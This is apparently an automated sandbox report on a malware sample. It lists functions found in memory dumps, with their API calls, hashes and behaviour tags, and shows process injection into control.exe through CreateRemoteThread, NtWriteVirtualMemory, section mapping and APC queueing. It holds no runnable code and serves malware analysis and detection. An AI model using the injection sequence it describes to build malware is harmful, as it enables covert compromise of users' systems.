                                                                                  Function 04DAD7E0, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction ID: f60099fa478b0d8e710bc349770dfb50560765addabcc81bf2245bcf772469f3
                                                                                  • Opcode Fuzzy Hash: a17af73f97df0c82a43e7586eb3227405641a4301284392d55f929c14e1347f6
                                                                                  • Instruction Fuzzy Hash: DF11B23160CB098F9B14EF29E849565B3E7FB98325710063DEC8FC3245EA74E946CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB6734, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegQueryValueExA.KERNEL32 ref: 04DB678A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  • Opcode ID: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction ID: 2c1e050df6b542539cfaf3aab0be3b15b429bcdf1fe109edcde51203a0dceffe
                                                                                  • Opcode Fuzzy Hash: 77cdeb7ec160b55a16230e76a1ab5e2e70236efd872a38e31f31aa2abee85eba
                                                                                  • Instruction Fuzzy Hash: EC215130628B48CFE751EF64D888B9AB7E1FB98305F50092DE48BC3650EB74E545CB46
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAD62C, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 40be76d9a7e2e0eceee35affdf468e5b172874890d82ad0a17fb7bf7e3040db4
                                                                                  • Instruction ID: f38d8a19b0c381ee59dbac14438b4a2544cb1208452ef69f86be32e3f3e5262e
                                                                                  • Opcode Fuzzy Hash: 40be76d9a7e2e0eceee35affdf468e5b172874890d82ad0a17fb7bf7e3040db4
                                                                                  • Instruction Fuzzy Hash: 5511A530718A484FE750DF69D89832A76D2FB8C326F29472DE45EC77E0C77888418B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC2A48, Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWaitableTimer.KERNEL32 ref: 04DC2AB1
                                                                                    • Part of subcall function 04DBA7AC: RegSetValueExA.KERNEL32 ref: 04DBA809
                                                                                    • Part of subcall function 04DBA7AC: RegCloseKey.KERNEL32 ref: 04DBA81E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1352355977-0
                                                                                  • Opcode ID: 316e3d48a4c1df50570e96364c1e920392a834c47cf5d58ca6a7b46f83977296
                                                                                  • Instruction ID: c5df851439137c7eb1a736aeee48b98e9e8db34a026d64472dd16a9ca8f7738f
                                                                                  • Opcode Fuzzy Hash: 316e3d48a4c1df50570e96364c1e920392a834c47cf5d58ca6a7b46f83977296
                                                                                  • Instruction Fuzzy Hash: 7301B13121CB088FDB49EB58D4887AAB7F0FBD8315F004A5EE58AC3160DF75D5818B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAACAC, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DCC130: NtWriteVirtualMemory.NTDLL ref: 04DCC14F
                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DAAD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProtectWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1789425917-0
                                                                                  • Opcode ID: 565bd1a8b43458a523ea30914509e0f98191a33216538679a5eb35c2d0911002
                                                                                  • Instruction ID: cb9850b74d575e9b4a37bf6da9c5e757907af26b85c1fbb92ff39d59c0e83a0d
                                                                                  • Opcode Fuzzy Hash: 565bd1a8b43458a523ea30914509e0f98191a33216538679a5eb35c2d0911002
                                                                                  • Instruction Fuzzy Hash: F4017C70618B088FCB48EF58A0C4525B7E0FB9C310B44456EE94EC7356CB70DD45CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB3790, Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,?,?,?,00000003,-00000001,-00000004,04DBC88A), ref: 04DB37AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 2543c2384adccc9ea999db09eb6b32c3343e7491fe28d169e686ad64536b363e
                                                                                  • Instruction ID: b391d3d9d90f8612838e875212dd5b4171e0021ecf82e576e8c55ebd26a7cba4
                                                                                  • Opcode Fuzzy Hash: 2543c2384adccc9ea999db09eb6b32c3343e7491fe28d169e686ad64536b363e
                                                                                  • Instruction Fuzzy Hash: 7F01E7B0605A098F9384EFAAD4C8A607BE4FB6C31275145BFD84DCB231E7309885CB40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCD0A4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DCD0F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction ID: 566678abab631cb01a48ebea970ee9d2fc4b46e86e45fd7ac5ae99bf32ff8378
                                                                                  • Opcode Fuzzy Hash: e809e0a73d4204c7adabfcf8fa1b5ba3f669599cca068ab71fd695eab82b94b0
                                                                                  • Instruction Fuzzy Hash: 53F0EC31318B4A5BEB88DF6DD894A2A76E2FBD8202F44193DB54AC3251DB78D4454B42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBED90, Relevance: 1.5, APIs: 1, Instructions: 36synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: eb3317c4c7dc970a3d0876899966021344071fb704fcef545d37ad465eeb6a14
                                                                                  • Instruction ID: f058e0e3c9d27a8ef481e414f0bcbfa82466a3dc3ac897e329c42f0cc8150f5c
                                                                                  • Opcode Fuzzy Hash: eb3317c4c7dc970a3d0876899966021344071fb704fcef545d37ad465eeb6a14
                                                                                  • Instruction Fuzzy Hash: 0DF06530318E098FB748EB6DAC887B576D2E7EC301B448139B54AC3264DE74D8819751
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC6844, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExitThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3424019298-0
                                                                                  • Opcode ID: 91412b57a02efed974964a542e15cf4fb6526690421768af5503dc8677920c75
                                                                                  • Instruction ID: ee120328b2b7d79c87be7b3fa7a705e72bb9a09927adc8ae46b84b48d82fd707
                                                                                  • Opcode Fuzzy Hash: 91412b57a02efed974964a542e15cf4fb6526690421768af5503dc8677920c75
                                                                                  • Instruction Fuzzy Hash: 5CF03030214A098FE719EF38DCD966677A2FB89311B04875CE056CB1D4DF78E802CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCD088, Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExitThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3424019298-0
                                                                                  • Opcode ID: a85e86b1b92122fea794b3e2601d81e36236363babc7d095c82d27713e95dbfa
                                                                                  • Instruction ID: a3b90b7b7e939e581407d81fc4099e2644079132bac3ea255d763e71ffc82f46
                                                                                  • Opcode Fuzzy Hash: a85e86b1b92122fea794b3e2601d81e36236363babc7d095c82d27713e95dbfa
                                                                                  • Instruction Fuzzy Hash: 7BB09B7474168987F53C77F85C4D1043621E745235F004F0CA321579D0DE3CA4115753
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB2A5F, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: dca284c96b36dc7e051d4cc5cedbe2c3ec57073149d79bedccabe5816c1f281b
                                                                                  • Instruction ID: 8aaf1a688faff040763ef27398f1972d36618e58354be60855f346da3e0cc90e
                                                                                  • Opcode Fuzzy Hash: dca284c96b36dc7e051d4cc5cedbe2c3ec57073149d79bedccabe5816c1f281b
                                                                                  • Instruction Fuzzy Hash: 6FE0127231CB454FAA48A64CB8435B573C1E799331B10547EF9C7C2113D916E81747CA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Analysis Process: control.exe PID: 5528 Parent PID: 5876 control.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 00DAC458, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 643memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: @
                                                                                  • API String ID: 1279760036-2766056989
                                                                                  • Opcode ID: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction ID: 9bfb44b1552c1025cbda3d21512f68b1180928e3b605c1446f5d3989076c0f9b
                                                                                  • Opcode Fuzzy Hash: 2b0b1a7e621844ba672fbd7c975c592666e47f3efc4b878a1f72b40adda0f817
                                                                                  • Instruction Fuzzy Hash: 3C129230628E0A8FDB68EF28D885A7673E1FB99710F54563EE44AC3251DF34E941CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DAF640, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQueryToken$Close
                                                                                  • String ID: 0
                                                                                  • API String ID: 459398573-4108050209
                                                                                  • Opcode ID: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction ID: ef145b8b2b9c4e4c695804a179cfe18412e134cb963b84d645a18f5174fe7a07
                                                                                  • Opcode Fuzzy Hash: f5895f5cec159cec64883b650c172f0a268582915eacc63c06442516161aa36d
                                                                                  • Instruction Fuzzy Hash: A331F830218B488FD764EF69D8C4B9AB7E5FBD9311F50492EE48EC3250DB349946CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB2BD8, Relevance: 6.2, APIs: 4, Instructions: 197nativethreadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtSetInformationProcess.NTDLL ref: 00DB2CA2
                                                                                  • CreateRemoteThread.KERNELBASE ref: 00DB2D52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateInformationProcessRemoteThread
                                                                                  • String ID:
                                                                                  • API String ID: 3020566308-0
                                                                                  • Opcode ID: 7a5a108850fdb7154b34b38eb7d85a215783067984f379b7249454fa01b043ad
                                                                                  • Instruction ID: d251149ef9cd10f63bd92e287d0907fa6f92443ffafa901ec04031affbd6fe24
                                                                                  • Opcode Fuzzy Hash: 7a5a108850fdb7154b34b38eb7d85a215783067984f379b7249454fa01b043ad
                                                                                  • Instruction Fuzzy Hash: 0B51B331618B09CFDB68EF28D8996BA77E1FB99301F10452EE94BC3252DE34DC458B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB6B80, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  • Opcode ID: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction ID: c18ca5579e283caf67d63bb90b10a27a6e1c27e8a33e79e5e3d635b6dc78a0d4
                                                                                  • Opcode Fuzzy Hash: f400db90b547cd876deae4f918f036170426a129d3192a9b6cb0266f0b9909ab
                                                                                  • Instruction Fuzzy Hash: 1E91A130618B09CFE768EF28D845BA677E5FB98310F14452EE98BC3251EF78D8468B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB5890, Relevance: 4.1, APIs: 2, Instructions: 1144synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexExA.KERNEL32 ref: 00DB595B
                                                                                  • GetUserNameA.ADVAPI32 ref: 00DB5BEC
                                                                                    • Part of subcall function 00DBFAD4: CreateThread.KERNELBASE ref: 00DBFB04
                                                                                    • Part of subcall function 00DBFAD4: QueueUserAPC.KERNELBASE ref: 00DBFB1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateUser$MutexNameQueueThread
                                                                                  • String ID:
                                                                                  • API String ID: 2503873790-0
                                                                                  • Opcode ID: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction ID: 08ae43ba6f4c0ac50d10c1d29d91434306ade78bf8fc97e978bdc28581b0ed7f
                                                                                  • Opcode Fuzzy Hash: db72f500cb4375137250dc09fd218a16c329592276e667ceebb262ae2802a11d
                                                                                  • Instruction Fuzzy Hash: D5829470618F08CFEB28EF28EC956A977E1F758301B24452ED44BC3265DE38E946CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC1EEC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL ref: 00DC208E
                                                                                    • Part of subcall function 00DBEF14: NtMapViewOfSection.NTDLL ref: 00DBEF60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Section$CreateView
                                                                                  • String ID: 0
                                                                                  • API String ID: 1585966358-4108050209
                                                                                  • Opcode ID: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction ID: e1bac0625bffba3c5ff3af22919674d8669c6e1565c535560f297420c1703bfc
                                                                                  • Opcode Fuzzy Hash: bff07a427199abbb54e216f8b5ce246404a06d6e97ef88a9cd07a294772bde48
                                                                                  • Instruction Fuzzy Hash: DA61A47061CB098FDB54EF19D899BA5B7E1FB98311F10856EE88AC7261DB34D841CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DCF9A4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL ref: 00DCF9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID: @
                                                                                  • API String ID: 2167126740-2766056989
                                                                                  • Opcode ID: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction ID: c7599a0fcfbc76102b443fda8fd19693d26eefa6a03df83002077992d6af0ccb
                                                                                  • Opcode Fuzzy Hash: 4419f098cbed19c14a3831561b5072b94f6620ca33e076ad1f3694b096d49546
                                                                                  • Instruction Fuzzy Hash: F8F09070618B089BDB44AFA8D8CC76D76E1F758301F500A6DE24AC7254DB788A488B42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DE1002, Relevance: 3.3, APIs: 2, Instructions: 345nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 00DE127A
                                                                                  • NtProtectVirtualMemory.NTDLL ref: 00DE1309
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847475847.0000000000DE1000.00000040.00000001.sdmp, Offset: 00DE1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: 2c4fd91396d6a4ba8ac323e38bdeecb8504601f1a65ea2831613cb5ba6baa9b8
                                                                                  • Instruction ID: 25edaaf377bcc5f4d316324e16564bf47d8121a1afb355e642efc4add73802db
                                                                                  • Opcode Fuzzy Hash: 2c4fd91396d6a4ba8ac323e38bdeecb8504601f1a65ea2831613cb5ba6baa9b8
                                                                                  • Instruction Fuzzy Hash: 27A1353531CBC84FC725EF29CC816A9B7E1FB96310F58496ED0CBC7252D634A84A8796
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DB1A9C, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 00DB1B11
                                                                                    • Part of subcall function 00DC9584: NtReadVirtualMemory.NTDLL ref: 00DC95A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1498878907-0
                                                                                  • Opcode ID: 9a740e8d5b5476b82932378add8e054f58975064e2ab11c2d11b02dad6292d67
                                                                                  • Instruction ID: 3fcf4b67dbfcd782dc3a77b69275bed5f0f92f87177eb57a25bccc85ca0c6ba8
                                                                                  • Opcode Fuzzy Hash: 9a740e8d5b5476b82932378add8e054f58975064e2ab11c2d11b02dad6292d67
                                                                                  • Instruction Fuzzy Hash: B0518230658B488BDB19EF18E8957E6B7E5FBD8340F44452EE84EC3245DE34DA418792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC9B4C, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 00DC9B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction ID: d02044633f44c927e12416eba8eba0fdc9593291567ab122cfe18dd6df5fec31
                                                                                  • Opcode Fuzzy Hash: 535eaa1e8fa4e57c8457d3b97bc13a9891625e3889b775ada58f90c1645a05b3
                                                                                  • Instruction Fuzzy Hash: 51018130718E0E9F9BA4EF68E4D8E65B3E1FBA8305B54056EA40AC7124DB35D881CB11
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DBEF14, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                  • Instruction ID: 48e5323b3df31315c55ea6745a8136f4ee108d21dde3c9b518dc89a105192392
                                                                                  • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                  • Instruction Fuzzy Hash: 0001D2B0A08B048FCB48EF69D0C8569BBE1FB5C311B10066FE94ACB796DB70D885CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DC9584, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryReadVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2834387570-0
                                                                                  • Opcode ID: e58987f80468f70ec91a2ed1fa834a055c9813d537c8f59ba17893b64c4e2010
                                                                                  • Instruction ID: 8354ce5d9268f1e8e66b01cd4ef18afdcdd19520999b0e99d2aacc4b968a17c3
                                                                                  • Opcode Fuzzy Hash: e58987f80468f70ec91a2ed1fa834a055c9813d537c8f59ba17893b64c4e2010
                                                                                  • Instruction Fuzzy Hash: 0BE0DF70B25A854FEB04AFB488DC638B7D1F78C301F10483DE985C7324DA39C8458742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DCC130, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL ref: 00DCC14F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: 044d061100dc2f65acf27f7f25103d145d0c5bc09adff489407d62ec8c1892a3
                                                                                  • Instruction ID: 9ada8c8851062317cf13a220f54ed608383cd93afe541c3085f7c13dce691ebe
                                                                                  • Opcode Fuzzy Hash: 044d061100dc2f65acf27f7f25103d145d0c5bc09adff489407d62ec8c1892a3
                                                                                  • Instruction Fuzzy Hash: F8E09A34B24B818BEB006BB58D8873932D0E798306F24083DEA89C7365DA2CC8448752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DCD604, Relevance: 6.2, APIs: 4, Instructions: 237threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3483329683-0
                                                                                  • Opcode ID: 75d28ba2168fea58c028bc4a2b0ec14675e6907b57b39628122c9898c1626db4
                                                                                  • Instruction ID: 64f4887de3b4b96183ae525d5ea3309440ab176660c7cc7a48dc21a2a54ae00d
                                                                                  • Opcode Fuzzy Hash: 75d28ba2168fea58c028bc4a2b0ec14675e6907b57b39628122c9898c1626db4
                                                                                  • Instruction Fuzzy Hash: 5361A13061CB498BDB58EB18E885BABB3D2FB88311F40052DE58FC3291DE34D945CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DD01D8, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE ref: 00DD02A9
                                                                                  • SetFilePointer.KERNELBASE ref: 00DD02C3
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DAC808), ref: 00DD02E5
                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00DD0300
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 2405668454-0
                                                                                  • Opcode ID: 44e22345d8330a418f6abae9002e3c4157819e7657d1355bb38e3d245859f345
                                                                                  • Instruction ID: 3556de5cf8c6ae20fb7a60dc002750beb694c3b10cd014dd2436c055c79c71f7
                                                                                  • Opcode Fuzzy Hash: 44e22345d8330a418f6abae9002e3c4157819e7657d1355bb38e3d245859f345
                                                                                  • Instruction Fuzzy Hash: 8E41D730258A084FDB58DF28D8C9B297BE2F788315F14466EE08AC7255DF39D847CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DCEC08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00DC3A14: RegCreateKeyA.ADVAPI32 ref: 00DC3A37
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DCEC71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  • Opcode ID: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction ID: 280c7f2dc00edc82a638c1c482bcba42ef9e654ba6c8bc2acbffe727bb53991b
                                                                                  • Opcode Fuzzy Hash: aebbbd127d4d5bc710cf9a7e1be097ee6a9f73d84e0cac9d7a5cc9686012e21f
                                                                                  • Instruction Fuzzy Hash: 4831B175518B49CFF304EF58EC45B66B7E5FB88305F00462DE44AC3262EBB89A45CB12
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00DD17F8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
